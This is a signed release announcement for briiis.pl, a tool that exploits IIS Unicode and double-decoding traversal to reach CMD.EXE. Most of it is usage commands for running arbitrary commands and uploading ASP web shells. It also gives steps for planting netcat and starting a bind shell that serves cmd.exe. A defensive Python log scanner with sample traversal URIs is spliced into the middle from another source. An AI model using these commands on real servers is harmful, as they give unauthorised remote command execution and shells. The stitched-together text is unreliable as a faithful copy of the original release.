-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iXsecurity Security Tool Release
briiis.pl v3.02
================

Tool Description
----------------
Briiis is a tool for testing web servers for "/" encoding
vulnerabilities that allow breaking out of the web root
from an executable directory, e.g. the IIS Unicode and
double encoding vulnerabilities.

Special features
----------------
* Tests a lot of commonly executable directories if any
  of these directories is on the same disk as
  C:\WINNT\SYSTEM32\CMD.EXE
  Very easy to add even more directories
* Caches the found directory
* SSL support with SSLeay (Unix)
* Easy to use text file upload
* Easy to use / encoding option
* Relative path name program execution
* Virtual host support

When to use briiis
------------------
Briiis should be used to test the IIS unicode or the IIS
superfluous decoding vulnerability. Briiis can also be
used to check for other "/" unicode or "/" decoding
vulnerabilities where the goal is to break out from the
web root from an executable directory to access CMD.EXE.
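
For the defending side, the "/" encodings described above can be recognised in request logs by percent-decoding each URI repeatedly and folding overlong UTF-8 before looking for ".." segments. The following is an added example, not part of briiis.pl or the original announcement; the log layout, function names and sample lines are assumptions constructed for illustration.

```python
from urllib.parse import unquote_to_bytes

MAX_ROUNDS = 4  # decode passes to try before giving up

def fold_overlong(raw):
    # 0xC0/0xC1 never lead valid UTF-8; fold such pairs the way a lenient decoder would.
    out, seen, i = bytearray(), False, 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append((raw[i] & 0x1F) << 6 | (raw[i + 1] & 0x3F))
            seen, i = True, i + 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out), seen

def normalise(uri):
    """Return (canonical path, set of flags) for a raw request URI."""
    path, flags = uri.split("?", 1)[0].encode("latin-1", "replace"), set()
    for rnd in range(MAX_ROUNDS):
        step, overlong = fold_overlong(unquote_to_bytes(path))
        if overlong:
            flags.add("overlong-utf8")
        if step == path:
            break
        if rnd >= 1:  # still changing on a second pass
            flags.add("double-encoded")
        path = step
    text = path.decode("latin-1").replace("\\", "/").lower()
    if ".." in text.split("/"):
        flags.add("traversal")
    return text, flags

# Constructed sample lines (assumed layout: client method raw-uri status)
SAMPLE_LOG = """\
192.0.2.10 GET /images/logo%20new.gif?v=2 200
192.0.2.44 GET /scripts/..%255c../winnt/system32/cmd.exe 200
192.0.2.44 GET /scripts/..%c0%af../winnt/system32/cmd.exe 404
192.0.2.10 GET /docs/100%25.html 200
""".splitlines()

def scan(lines):
    """Return (client, status, canonical path, sorted flags) per flagged line."""
    rows = [line.split() for line in lines]
    hits = [(c, s, *normalise(u)) for c, _m, u, s in rows]
    return [(c, s, p, sorted(f)) for c, s, p, f in hits if f]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A flagged line with status 200 deserves a closer look than one that returned 404, and the scan only works if the log records the URI as it was sent, before any decoding by the server or a proxy.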

How to use briiis
-----------------
Test a server for the unicode vulnerability with the
command:
  briiis.pl -s server

Test the decoding vulnerability:
  briiis.pl -s server -F %255c

Copy CMD.EXE to the web executable directory
(used for running commands and uploading files):
  briiis.pl -s server -x

Run commands:
  briiis.pl -s server -C "dir /a"

Upload an ASP script to the executable directory
(like cmdasp.asp and upload.asp):
  briiis.pl -s server -u upload.asp

Other options
-------------
The virtual host option, -H, is used when multiple web
servers are bound to the same IP and port. One such case
is reverse proxying.

The standard "-s www.server.dom" sets the "Host:" header to:
  Host: www.server.dom
If other virtual servers need to be tested, run:
  briiis.pl -s www.server.dom -H www.server2.dom

Briiis creates a cache file named "<program_name>.cache".
Delete the cache file if you want to run a new test after
patching the server.

The binary file upload does not work due to lack of
privileges. If you want to test it:
* Copy NC.EXE or something to NC.BIN
* briiis.pl -s server -U NC.BIN -d -l c:\
* There is now a NC.SCR, debug script, in c:\
* With cmdasp.asp run
    debug < nc.scr
* Start NC.BIN with cmdasp.asp
    c:\nc.bin -l -p 7171 -n -v -e cmd.exe

The binary upload function can only handle small files.
Use upload.asp or TFTP when uploading larger files.

Background and more information
-------------------------------
Unicode vulnerability information:
  http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Superfluous Decoding Vulnerability information:
  http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

TODO
----
* Graphical interface (Planned Q4 2002)
* Basic Authentication (Planned Q3 2001)

------------------------------------------------
Ian Vitek, mailto:[EMAIL PROTECTED]
------------------------------------------------
iXsecurity (formerly Infosec) is a Swedish and United
Kingdom based tiger team that has worked with
computer-related security since 1982 and done technical
security audits (pentests) since 1995.
iXsecurity welcomes all new co-workers in Sweden
and United Kingdom.
------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1
iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV
WnyLpKEcIdhaDfeNKALz2rNG
=FhpF
-----END PGP SIGNATURE-----
Briiis.pl
=========
(See attached file: briiis.pl)